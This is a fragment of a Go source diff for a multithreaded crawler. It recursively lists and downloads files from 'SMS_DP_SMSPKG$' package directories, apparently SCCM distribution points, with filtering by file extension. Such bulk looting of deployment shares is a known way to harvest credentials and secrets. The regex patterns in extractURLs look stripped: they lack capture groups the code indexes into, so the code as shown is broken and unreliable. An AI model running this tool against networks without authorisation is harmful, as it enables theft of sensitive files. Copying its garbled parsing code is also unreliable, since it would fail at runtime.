slog.Error(fmt.Sprintf("Error creating base output directory: %v\n", err)) + return + } + + outPathFilesBase := filepath.Join(outputDir, "files") + // Ensure the output directory exists for files + if err := os.MkdirAll(outPathFilesBase, os.ModePerm); err != nil { + slog.Error(fmt.Sprintf("Error creating base output directory: %v\n", err)) + return + } + + // Create a wait group to wait for all goroutines to finish + var wg sync.WaitGroup + wg.Add(len(fileNames)) + + // Create a channel to limit the number of concurrent downloads + semaphore := make(chan struct{}, numThreads) + + if randomize { + randomizeStrings(fileNames) + } + + // Iterate over the filenames and download the files + for _, filename := range fileNames { + filename = strings.ReplaceAll(filename, "\\", "/") + if strings.Contains(filename, "/") { + dir := filepath.Dir(filename) + if err := os.MkdirAll(filepath.Join(outPath, dir), os.ModePerm); err != nil { + slog.Error(fmt.Sprintf("Error creating base output directory: %v\n", err)) + return + } + } + + wanted, outPathFiles := fileWanted(allowExtensions, downloadNoExt, filename, outputDir) + if !wanted { + wg.Done() + continue + } + + // Add an empty struct to the semaphore channel to "take up" one slot/thread + semaphore <- struct{}{} + go downloadINIAndFile(outPath, outPathFiles, filename, dirName, &wg, semaphore) + } + wg.Wait() + +} + +// Helper function to check if two slices of bytes are equal +func bytesEqual(a, b []byte) bool { + if len(a) != len(b) { + return false + } + for i := range a { + if a[i] != b[i] { + return false + } + } + return true +} + +func extractFileName(href string) string { + // Split the URL by '/' + parts := strings.Split(href, "/") + // Get the last part of the URL + lastPart := parts[len(parts)-1] + // Remove any leading or trailing spaces + trimmedPart := strings.TrimSpace(lastPart) + return trimmedPart +} + +func randomizeStrings(strings []string) { + // Create a new source for random numbers + source := rand.NewSource(time.Now().UnixNano()) + random := rand.New(source) + + // Randomize the order of the slice using sort.Slice + sort.Slice(strings, func(i, j int) bool { + return random.Intn(2) == 0 + }) +} + +func extractURLs(fileDirectoryURL string) ([]string, []string) { + html, err := getURL(fileDirectoryURL) + if err != nil { + return nil, nil + } + + var fileURLs []string + var dirURLs []string + + // Regular expression pattern to match URLs + urlPattern := `\d+ ` + + // Regular expression pattern to match directory URLs + dirPattern := `<dir> ` + + // Find all URLs + urls := regexp.MustCompile(urlPattern).FindAllStringSubmatch(html, -1) + for _, url := range urls { + fileURLs = append(fileURLs, url[1]) + } + + // Find all directory URLs + doubleDirURLs := regexp.MustCompile(dirPattern).FindAllStringSubmatch(html, -1) + for _, url := range doubleDirURLs { + dirURLs = append(dirURLs, url[1]) + } + + return fileURLs, dirURLs +} + +func getAllFileURLsFromDirNames(dataLibFiles []string, numThreads int, randomize bool) []string { + + bar := progressbar.NewOptions(-1, + progressbar.OptionSetWriter(ansi.NewAnsiStdout()), + progressbar.OptionEnableColorCodes(true), + progressbar.OptionShowBytes(false), + progressbar.OptionShowCount(), + progressbar.OptionShowElapsedTimeOnFinish(), + progressbar.OptionSetWidth(30), + progressbar.OptionSetDescription("[cyan][1/2][reset] Getting file URLs"), + progressbar.OptionSetTheme(progressbar.Theme{ + Saucer: "[green]=[reset]", + SaucerHead: "[green]>[reset]", + SaucerPadding: " ", + BarStart: "[", + BarEnd: "]", + })) + + // Create a wait group to wait for all goroutines to finish + var wg sync.WaitGroup + wg.Add(len(dataLibFiles)) + // Create a mutex for file appending + mu := &sync.Mutex{} + + // Create a channel to limit the number of concurrent downloads + semaphore := make(chan struct{}, numThreads) + + if randomize { + randomizeStrings(dataLibFiles) + } + + for _, dataLibFile := range dataLibFiles { + // Skip INI files + if strings.HasSuffix(dataLibFile, ".INI") { + wg.Done() + continue + } + var fileDirectoryURL string + if !strings.Contains(dataLibFile, "http") { + fileDirectoryURL = fmt.Sprintf("%s/SMS_DP_SMSPKG$/%s", urlBase, dataLibFile) + } else { + fileDirectoryURL = dataLibFile + } + + // Add an empty struct to the semaphore channel to "take up" one slot/thread + semaphore <- struct{}{} + go getFilesFromDirNames(fileDirectoryURL, bar, &wg, semaphore, mu) + + } + wg.Wait() + bar.Finish() + return allFileURLs + +} + +func getFilesFromDirNames(fileDirectoryURL string, bar *progressbar.ProgressBar, wg *sync.WaitGroup, semaphore chan struct{}, mu *sync.Mutex) { + + fileURLs, dirURLs := extractURLs(fileDirectoryURL) + bar.Add(len(fileURLs)) + + mu.Lock() + allFileURLs = append(allFileURLs, fileURLs...) + mu.Unlock() + // Read one struct from the semaphore channel to "let go" of one slot/thread + <-semaphore + + if len(dirURLs) > 0 { + slog.Debug(fmt.Sprintf("Found %d directories in %s", len(dirURLs), fileDirectoryURL)) + for _, dirURL := range dirURLs { + wg.Add(1) + // Add an empty struct to the semaphore channel to "take up" one slot/thread + semaphore <- struct{}{} + getFilesFromDirNames(dirURL, bar, wg, semaphore, mu) + } + } + + // If we "Done()" before the Add it the wg could hit zero and then an Add could run and panic the Wait() + wg.Done() +} + +func fileWanted(allowExtensions []string, downloadNoExt bool, filename string, outputDir string) (bool, string) { + var outPathFiles string + fileSuffix := filepath.Ext(filename) + // Remove the leading dot (.) from the file suffix + if len(fileSuffix) > 1 { + fileSuffix = fileSuffix[1:] + if allowExtensions != nil && !slices.Contains(allowExtensions, "all") && !slices.Contains(allowExtensions, fileSuffix) { + slog.Debug(fmt.Sprintf("Skipping %s: %s not wanted", filename, fileSuffix)) + return false, "" + } + outPathFiles = filepath.Join(outputDir, "files", fileSuffix) + // Ensure the output directory exists for files + if err := os.MkdirAll(outPathFiles, os.ModePerm); err != nil { + slog.Error(fmt.Sprintf("Error creating file type output directory: %v\n", err)) + return false, "" + } + } else { + if downloadNoExt { + slog.Debug(fmt.Sprintf("File %s has no file extension, downloading it!", filename)) + outPathFiles = filepath.Join(outputDir, "files", "UKN") + // Ensure the output directory exists for files + if err := os.MkdirAll(outPathFiles, os.ModePerm); err != nil { + slog.Error(fmt.Sprintf("Error creating file type output directory: %v\n", err)) + return false, "" + } + } else { + slog.Debug(fmt.Sprintf("File %s has no file extension, and files without extensions are not being kept, skipping", filename)) + return false, "" + } + } + return true, outPathFiles +}